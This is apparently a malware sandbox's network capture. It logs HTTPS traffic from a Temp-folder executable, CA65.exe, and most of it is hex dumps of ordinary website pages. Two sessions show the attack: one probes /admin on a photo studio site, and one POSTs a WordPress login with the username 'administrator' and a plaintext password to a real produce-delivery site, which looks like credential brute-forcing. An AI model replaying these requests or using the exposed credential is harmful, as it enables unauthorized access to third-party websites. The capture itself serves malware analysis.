2023-12-22 20:15:12 UTC	16384	IN	Data Raw: 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 35 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 36 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2d 63 73 73 27 20 68 72 65 66 3d 27 2f 2f 63 64 6e 2d 36 34 31 62 61 35 38 31 63 31 61 63 31 61 33 35 36 38 62 36 33 33 38 38 2e 63 6c 6f 73 74 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2f 69 6e 63 6c 75 64 65 73 2f 63 73 73 2f 73 74 79 6c 65 73 2e 63 73 73 3f 76 65 72 3d 35 2e 38 2e 32 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 Data Ascii: e{font-size: 1.5em;line-height: 1.6;}</style><link rel='stylesheet' id='contact-form-7-css' href='//cdn-641ba581c1ac1a3568b63388.closte.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.8.2' type='text/css' media='all' /><link rel='st
2023-12-22 20:15:12 UTC	16384	IN	Data Raw: 6e 2e 61 6c 74 3a 64 69 73 61 62 6c 65 64 2c 2e 62 75 74 74 6f 6e 2d 72 6f 75 6e 64 20 61 2e 62 75 74 74 6f 6e 2e 61 6c 74 3a 64 69 73 61 62 6c 65 64 3a 68 6f 76 65 72 2c 2e 62 75 74 74 6f 6e 2d 72 6f 75 6e 64 20 61 2e 62 75 74 74 6f 6e 2e 61 6c 74 3a 64 69 73 61 62 6c 65 64 5b 64 69 73 61 62 6c 65 64 5d 2c 2e 62 75 74 74 6f 6e 2d 72 6f 75 6e 64 20 61 2e 62 75 74 74 6f 6e 2e 61 6c 74 3a 64 69 73 61 62 6c 65 64 5b 64 69 73 61 62 6c 65 64 5d 3a 68 6f 76 65 72 2c 2e 62 75 74 74 6f 6e 2d 72 6f 75 6e 64 20 62 75 74 74 6f 6e 2e 62 75 74 74 6f 6e 2e 61 6c 74 2e 64 69 73 61 62 6c 65 64 2c 2e 62 75 74 74 6f 6e 2d 72 6f 75 6e 64 20 62 75 74 74 6f 6e 2e 62 75 74 74 6f 6e 2e 61 6c 74 2e 64 69 73 61 62 6c 65 64 3a 68 6f 76 65 72 2c 2e 62 75 74 74 6f 6e 2d 72 6f 75 6e Data Ascii: n.alt:disabled,.button-round a.button.alt:disabled:hover,.button-round a.button.alt:disabled[disabled],.button-round a.button.alt:disabled[disabled]:hover,.button-round button.button.alt.disabled,.button-round button.button.alt.disabled:hover,.button-roun
2023-12-22 20:15:12 UTC	16384	IN	Data Raw: 2d 70 6c 61 69 6e 20 23 54 6f 70 5f 62 61 72 20 2e 77 70 6d 6c 2d 6c 61 6e 67 75 61 67 65 73 2c 2e 6d 65 6e 75 6f 2d 6e 6f 2d 62 6f 72 64 65 72 73 2e 68 65 61 64 65 72 2d 70 6c 61 69 6e 20 23 54 6f 70 5f 62 61 72 20 61 2e 61 63 74 69 6f 6e 5f 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 30 7d 2e 6d 65 6e 75 6f 2d 72 69 67 68 74 20 23 54 6f 70 5f 62 61 72 20 2e 6d 65 6e 75 5f 77 72 61 70 70 65 72 7b 66 6c 6f 61 74 3a 72 69 67 68 74 7d 2e 6d 65 6e 75 6f 2d 72 69 67 68 74 2e 68 65 61 64 65 72 2d 73 74 61 63 6b 3a 6e 6f 74 28 2e 68 65 61 64 65 72 2d 63 65 6e 74 65 72 29 20 23 54 6f 70 5f 62 61 72 20 2e 6d 65 6e 75 5f 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 35 30 70 78 7d 62 6f 64 79 2e 68 65 61 64 65 72 2d 63 72 65 61 Data Ascii: -plain #Top_bar .wpml-languages,.menuo-no-borders.header-plain #Top_bar a.action_button{border-width:0}.menuo-right #Top_bar .menu_wrapper{float:right}.menuo-right.header-stack:not(.header-center) #Top_bar .menu_wrapper{margin-right:150px}body.header-crea
2023-12-22 20:15:12 UTC	729	IN	Data Raw: 2d 66 69 78 65 64 20 23 41 63 74 69 6f 6e 5f 62 61 72 2c 2e 68 65 61 64 65 72 2d 70 6c 61 69 6e 20 23 41 63 74 69 6f 6e 5f 62 61 72 2c 2e 68 65 61 64 65 72 2d 73 70 6c 69 74 20 23 41 63 74 69 6f 6e 5f 62 61 72 2c 2e 68 65 61 64 65 72 2d 73 68 6f 70 20 23 41 63 74 69 6f 6e 5f 62 61 72 2c 2e 68 65 61 64 65 72 2d 73 68 6f 70 2d 73 70 6c 69 74 20 23 41 63 74 69 6f 6e 5f 62 61 72 2c 2e 68 65 61 64 65 72 2d 73 74 61 63 6b 20 23 41 63 74 69 6f 6e 5f 62 61 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 43 32 43 32 43 7d 23 53 6c 69 64 69 6e 67 2d 74 6f 70 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 33 66 33 66 33 7d 23 53 6c 69 64 69 6e 67 2d 74 6f 70 20 61 2e 73 6c 69 64 69 6e 67 2d 74 6f 70 2d 63 6f 6e 74 72 6f 6c 7b 62 6f 72 64 Data Ascii: -fixed #Action_bar,.header-plain #Action_bar,.header-split #Action_bar,.header-shop #Action_bar,.header-shop-split #Action_bar,.header-stack #Action_bar{background-color:#2C2C2C}#Sliding-top{background-color:#f3f3f3}#Sliding-top a.sliding-top-control{bord
2023-12-22 20:15:12 UTC	16384	IN	Data Raw: 39 64 63 62 0d 0a 2e 74 69 6d 65 6c 69 6e 65 5f 69 74 65 6d 73 2c 2e 69 63 6f 6e 5f 62 6f 78 20 61 20 2e 64 65 73 63 2c 2e 69 63 6f 6e 5f 62 6f 78 20 61 3a 68 6f 76 65 72 20 2e 64 65 73 63 2c 2e 66 65 61 74 75 72 65 5f 6c 69 73 74 20 75 6c 20 6c 69 20 61 2c 2e 6c 69 73 74 5f 69 74 65 6d 20 61 2c 2e 6c 69 73 74 5f 69 74 65 6d 20 61 3a 68 6f 76 65 72 2c 2e 77 69 64 67 65 74 5f 72 65 63 65 6e 74 5f 65 6e 74 72 69 65 73 20 75 6c 20 6c 69 20 61 2c 2e 66 6c 61 74 5f 62 6f 78 20 61 2c 2e 66 6c 61 74 5f 62 6f 78 20 61 3a 68 6f 76 65 72 2c 2e 73 74 6f 72 79 5f 62 6f 78 20 2e 64 65 73 63 2c 2e 63 6f 6e 74 65 6e 74 5f 73 6c 69 64 65 72 2e 63 61 72 6f 75 73 65 6c 20 20 75 6c 20 6c 69 20 61 20 2e 74 69 74 6c 65 2c 2e 63 6f 6e 74 65 6e 74 5f 73 6c 69 64 65 72 2e 66 6c Data Ascii: 9dcb.timeline_items,.icon_box a .desc,.icon_box a:hover .desc,.feature_list ul li a,.list_item a,.list_item a:hover,.widget_recent_entries ul li a,.flat_box a,.flat_box a:hover,.story_box .desc,.content_slider.carousel ul li a .title,.content_slider.fl
2023-12-22 20:15:13 UTC	16384	IN	Data Raw: 6e 74 5f 65 6e 74 72 69 65 73 20 75 6c 20 6c 69 3a 61 66 74 65 72 2c 2e 6d 66 6e 2d 66 6f 6f 74 65 72 20 2e 77 69 64 67 65 74 5f 6d 66 6e 5f 6d 65 6e 75 20 75 6c 20 6c 69 20 61 3a 68 6f 76 65 72 2c 2e 6d 66 6e 2d 66 6f 6f 74 65 72 20 2e 77 69 64 67 65 74 5f 70 72 6f 64 75 63 74 5f 63 61 74 65 67 6f 72 69 65 73 20 75 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 61 32 63 32 65 7d 2e 6d 66 6e 2d 66 6f 6f 74 65 72 20 2e 52 65 63 65 6e 74 5f 70 6f 73 74 73 20 75 6c 20 6c 69 20 61 20 2e 64 65 73 63 20 2e 64 61 74 65 2c 2e 6d 66 6e 2d 66 6f 6f 74 65 72 20 2e 77 69 64 67 65 74 5f 72 65 63 65 6e 74 5f 65 6e 74 72 69 65 73 20 75 6c 20 6c 69 20 2e 70 6f 73 74 2d 64 61 74 65 2c 2e 6d 66 6e 2d 66 6f 6f 74 65 72 20 2e 74 70 5f 72 65 63 65 6e 74 5f 74 Data Ascii: nt_entries ul li:after,.mfn-footer .widget_mfn_menu ul li a:hover,.mfn-footer .widget_product_categories ul{background-color:#2a2c2e}.mfn-footer .Recent_posts ul li a .desc .date,.mfn-footer .widget_recent_entries ul li .post-date,.mfn-footer .tp_recent_t
2023-12-22 20:15:13 UTC	7640	IN	Data Raw: 66 69 6e 65 64 20 3f 20 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 20 3a 20 77 69 6e 64 6f 77 2e 52 53 49 57 3b 0a 09 09 09 09 77 69 6e 64 6f 77 2e 52 53 49 48 20 3d 20 77 69 6e 64 6f 77 2e 52 53 49 48 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 20 3f 20 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 20 3a 20 77 69 6e 64 6f 77 2e 52 53 49 48 3b 0a 09 09 09 09 74 72 79 20 7b 0a 09 09 09 09 09 76 61 72 20 70 77 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 2e 63 29 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 6f 66 66 73 65 74 57 69 64 74 68 2c 0a 09 09 09 09 09 09 6e 65 77 68 3b 0a 09 09 09 09 09 70 77 20 3d 20 70 77 3d 3d 3d 30 20 7c 7c 20 69 73 4e 61 4e 28 70 77 29 20 7c 7c 20 28 65 2e 6c 3d 3d 22 66 75 6c 6c 77 69 64 Data Ascii: fined ? window.innerWidth : window.RSIW;window.RSIH = window.RSIH===undefined ? window.innerHeight : window.RSIH;try {var pw = document.getElementById(e.c).parentNode.offsetWidth,newh;pw = pw===0 \|\| isNaN(pw) \|\| (e.l=="fullwid

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
317	192.168.2.4	56347	167.235.0.29	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:11 UTC	179	OUT	GET /admin HTTP/1.1 Host: www.fotoestudiomiret.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:11 UTC	382	IN	Data Raw: 48 54 54 50 2f 31 2e 30 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 32 32 20 44 65 63 20 32 30 32 33 20 32 30 3a 31 35 3a 31 31 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 58 53 53 2d 50 72 6f 74 65 63 74 69 6f 6e 3a 20 31 3b 20 6d 6f 64 65 3d 62 6c 6f 63 6b 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 48 65 61 64 65 72 73 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4d 65 74 68 6f 64 73 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 4d 65 74 68 6f 64 3a 20 2a 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 Data Ascii: HTTP/1.0 404 Not FoundDate: Fri, 22 Dec 2023 20:15:11 GMTServer: ApacheX-XSS-Protection: 1; mode=blockAccess-Control-Allow-Origin: Access-Control-Allow-Headers: Access-Control-Allow-Methods: Access-Control-Request-Method: Content-Secur
2023-12-22 20:15:11 UTC	7810	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 0d 0a 20 20 20 20 0a 3c 73 74 79 6c 65 3e 0a 68 74 6d 6c 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 74 6f 65 73 74 75 64 69 6f 6d 69 72 65 74 2e 63 6f 6d 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 Data Ascii: <!DOCTYPE html><html lang="es"> <head> <style>html,body{background-color:;}</style><base href="https://www.fotoestudiomiret.com" /><meta charset="utf-8" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http
2023-12-22 20:15:12 UTC	16384	IN	Data Raw: 69 6f 6e 2d 63 69 72 63 6c 65 22 2c 22 65 78 63 6c 61 6d 61 74 69 6f 6e 2d 74 72 69 61 6e 67 6c 65 22 3a 22 66 61 73 20 66 61 2d 65 78 63 6c 61 6d 61 74 69 6f 6e 2d 74 72 69 61 6e 67 6c 65 22 2c 22 65 78 63 6c 61 6d 61 74 69 6f 6e 22 3a 22 66 61 73 20 66 61 2d 65 78 63 6c 61 6d 61 74 69 6f 6e 22 2c 22 65 78 70 61 6e 64 22 3a 22 66 61 73 20 66 61 2d 65 78 70 61 6e 64 22 2c 22 65 78 74 65 72 6e 61 6c 2d 6c 69 6e 6b 22 3a 22 66 61 73 20 66 61 2d 65 78 74 65 72 6e 61 6c 2d 6c 69 6e 6b 22 2c 22 65 79 65 22 3a 22 66 61 73 20 66 61 2d 65 79 65 22 2c 22 65 79 65 2d 73 6c 61 73 68 22 3a 22 66 61 73 20 66 61 2d 65 79 65 2d 73 6c 61 73 68 22 2c 22 66 61 63 65 2d 67 72 69 6e 22 3a 22 66 61 73 20 66 61 2d 67 72 69 6e 22 2c 22 66 61 63 65 62 6f 6f 6b 22 3a 22 66 61 62 Data Ascii: ion-circle","exclamation-triangle":"fas fa-exclamation-triangle","exclamation":"fas fa-exclamation","expand":"fas fa-expand","external-link":"fas fa-external-link","eye":"fas fa-eye","eye-slash":"fas fa-eye-slash","face-grin":"fas fa-grin","facebook":"fab
2023-12-22 20:15:12 UTC	16384	IN	Data Raw: 6f 73 73 68 61 69 72 73 22 3a 22 66 61 6c 20 66 61 2d 63 72 6f 73 73 68 61 69 72 73 22 2c 22 63 73 73 33 22 3a 22 66 61 62 20 66 61 2d 63 73 73 33 22 2c 22 63 75 62 65 73 22 3a 22 66 61 73 20 66 61 2d 63 75 62 65 73 22 2c 22 64 65 6c 69 63 69 6f 75 73 22 3a 22 66 61 62 20 66 61 2d 64 65 6c 69 63 69 6f 75 73 22 2c 22 64 65 73 6b 74 6f 70 22 3a 22 66 61 73 20 66 61 2d 64 65 73 6b 74 6f 70 22 2c 22 64 65 76 69 61 6e 74 61 72 74 22 3a 22 66 61 62 20 66 61 2d 64 65 76 69 61 6e 74 61 72 74 22 2c 22 64 6f 74 2d 63 69 72 63 6c 65 22 3a 22 66 61 72 20 66 61 2d 64 6f 74 2d 63 69 72 63 6c 65 22 2c 22 64 6f 77 6e 6c 6f 61 64 22 3a 22 66 61 73 20 66 61 2d 64 6f 77 6e 6c 6f 61 64 22 2c 22 64 72 69 62 62 62 6c 65 22 3a 22 66 61 62 20 66 61 2d 64 72 69 62 62 62 6c 65 22 Data Ascii: osshairs":"fal fa-crosshairs","css3":"fab fa-css3","cubes":"fas fa-cubes","delicious":"fab fa-delicious","desktop":"fas fa-desktop","deviantart":"fab fa-deviantart","dot-circle":"far fa-dot-circle","download":"fas fa-download","dribbble":"fab fa-dribbble"
2023-12-22 20:15:12 UTC	16384	IN	Data Raw: 22 20 64 61 74 61 2d 6c 65 76 65 6c 3d 22 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 63 61 72 65 74 2d 72 69 67 68 74 20 64 65 66 61 75 6c 74 2d 66 61 73 69 7a 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 64 61 74 61 2d 63 6f 6c 6c 61 70 73 65 3d 22 66 61 2d 63 61 72 65 74 2d 72 69 67 68 74 20 64 65 66 61 75 6c 74 2d 66 61 73 69 7a 65 22 20 64 61 74 61 2d 73 75 63 63 65 73 73 3d 22 66 61 2d 63 61 72 65 74 2d 64 6f 77 6e 20 64 65 66 61 75 6c 74 2d 66 61 73 69 7a 65 22 3e 3c 2f 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 75 6c 20 Data Ascii: " data-level="0"> <i class="fas fa-caret-right default-fasize" aria-hidden="true" data-collapse="fa-caret-right default-fasize" data-success="fa-caret-down default-fasize"></i> </a></div><ul
2023-12-22 20:15:12 UTC	12337	IN	Data Raw: 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 66 6c 65 78 2d 65 6e 64 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 65 6d 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 65 6d 3b 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 0a 20 20 3c 64 69 76 20 69 64 3d 22 61 76 69 73 6f 2d 63 6f 6f 6b 69 65 73 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 27 61 76 69 73 6f 2d 63 6f 6f 6b 69 65 2d 74 65 78 74 27 20 69 64 3d 22 61 76 69 73 6f 2d 63 6f 6f 6b 69 65 73 2d 74 65 78 74 22 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 27 61 76 69 73 6f 2d 63 6f 6f 6b 69 65 2d 62 75 74 74 6f 6e 73 27 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 Data Ascii: justify-content: flex-end; margin-top: 2em; margin-bottom: 1em; } </style> <div id="aviso-cookies"> <div class='aviso-cookie-text' id="aviso-cookies-text"> </div> <div class='aviso-cookie-buttons'> <a href="https://w

Session ID	Source IP	Source Port	Destination IP	Destination Port
318	192.168.2.4	57175	104.26.0.173	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:11 UTC	455	OUT	POST /wp-login.php HTTP/1.1 Host: theproducebox.com Accept: / Accept-Encoding: deflate, gzip Cookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=3ma2mp4egmtg531c361dfg1mdh User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://theproducebox.com/wp-login.php?redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&reauth=1 Content-Length: 140 Content-Type: application/x-www-form-urlencoded
2023-12-22 20:15:11 UTC	140	OUT	Data Raw: 6c 6f 67 3d 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 26 70 77 64 3d 70 65 72 72 79 37 30 39 25 34 30 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=administrator&pwd=perry709%40&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&testcookie=1
2023-12-22 20:15:11 UTC	878	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:15:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.4.15 Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Cache-Control: max-age=0, no-cache X-Frame-Options: SAMEORIGIN Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure X-Mod-Pagespeed: 1.13.35.2-0 Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=p4epjp8NkO%2F%2F42w%2FrsUkUzs3BW4%2BpZLI3VTtXn1L9Gg8%2B7WhumvAAy%2FFH1et2E2zayShBbszHA3ascuG01WBQW62PYHpRgAN2yPNGLyaKVCt8%2BS%2FTv7BmRwyzmwcXf7uzdOx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b09118e8b67c0-MIA
2023-12-22 20:15:11 UTC	491	IN	Data Raw: 31 38 31 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 54 68 65 20 50 72 6f 64 75 63 65 20 42 6f 78 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 Data Ascii: 181f<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><title>Log In &lsaquo; The Produce Box — WordPress</title><meta name='robots' content='noindex, follow'/><link rel='styleshe
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 61 6c 6c 27 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 66 6f 72 6d 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 66 6f 72 6d 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 31 30 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 31 30 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 2f 3e 0a 3c 6c 69 6e 6b 20 Data Ascii: all'/><link rel='stylesheet' id='forms-css' href='https://theproducebox.com/wp-admin/css/forms.min.css?ver=6.4.2' media='all'/><link rel='stylesheet' id='l10n-css' href='https://theproducebox.com/wp-admin/css/l10n.min.css?ver=6.4.2' media='all'/><link
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 71 75 69 72 65 64 22 2f 3e 0a 09 09 09 3c 2f 70 3e 0a 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 75 73 65 72 2d 70 61 73 73 2d 77 72 61 70 22 3e 0a 09 09 09 09 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 75 73 65 72 5f 70 61 73 73 22 3e 50 61 73 73 77 6f 72 64 3c 2f 6c 61 62 65 6c 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 70 77 64 22 3e 0a 09 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 20 6e 61 6d 65 3d 22 70 77 64 22 20 69 64 3d 22 75 73 65 72 5f 70 61 73 73 22 20 61 72 69 61 2d 64 65 73 63 72 69 62 65 64 62 79 3d 22 6c 6f 67 69 6e 5f 65 72 72 6f 72 22 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 20 70 61 73 73 77 6f 72 64 2d 69 6e 70 75 74 22 20 76 61 6c 75 65 3d 22 22 20 73 69 7a 65 3d 22 32 30 22 20 61 75 Data Ascii: quired"/></p><div class="user-pass-wrap"><label for="user_pass">Password</label><div class="wp-pwd"><input type="password" name="pwd" id="user_pass" aria-describedby="login_error" class="input password-input" value="" size="20" au
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 6c 65 63 74 28 29 3b 7d 63 61 74 63 68 28 65 72 29 7b 7d 7d 2c 32 30 30 29 3b 7d 77 70 5f 61 74 74 65 6d 70 74 5f 66 6f 63 75 73 28 29 3b 69 66 28 74 79 70 65 6f 66 20 77 70 4f 6e 6c 6f 61 64 3d 3d 3d 27 66 75 6e 63 74 69 6f 6e 27 29 7b 77 70 4f 6e 6c 6f 61 64 28 29 7d 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 70 20 69 64 3d 22 62 61 63 6b 74 6f 62 6c 6f 67 22 3e 0a 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 22 3e 26 6c 61 72 72 3b 20 47 6f 20 74 6f 20 54 68 65 20 50 72 6f 64 75 63 65 20 42 6f 78 3c 2f 61 3e 09 09 3c 2f 70 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 2f 2f 3c 21 Data Ascii: lect();}catch(er){}},200);}wp_attempt_focus();if(typeof wpOnload==='function'){wpOnload()}//...</script><p id="backtoblog"><a href="https://theproducebox.com/">← Go to The Produce Box</a></p></div><script type="text/javascript">//<!
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 3f 76 65 72 3d 33 2e 31 35 2e 30 22 20 69 64 3d 22 77 70 2d 70 6f 6c 79 66 69 6c 6c 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 68 6f 6f 6b 73 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 63 36 61 65 63 39 61 38 64 34 65 35 61 35 64 35 34 33 61 31 22 20 69 64 3d 22 77 70 2d 68 6f 6f 6b 73 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 Data Ascii: ?ver=3.15.0" id="wp-polyfill-js"></script><script type="text/javascript" src="https://theproducebox.com/wp-includes/js/dist/hooks.min.js?ver=c6aec9a8d4e5a5d543a1" id="wp-hooks-js"></script><script type="text/javascript" src="https://theproducebox.com/wp
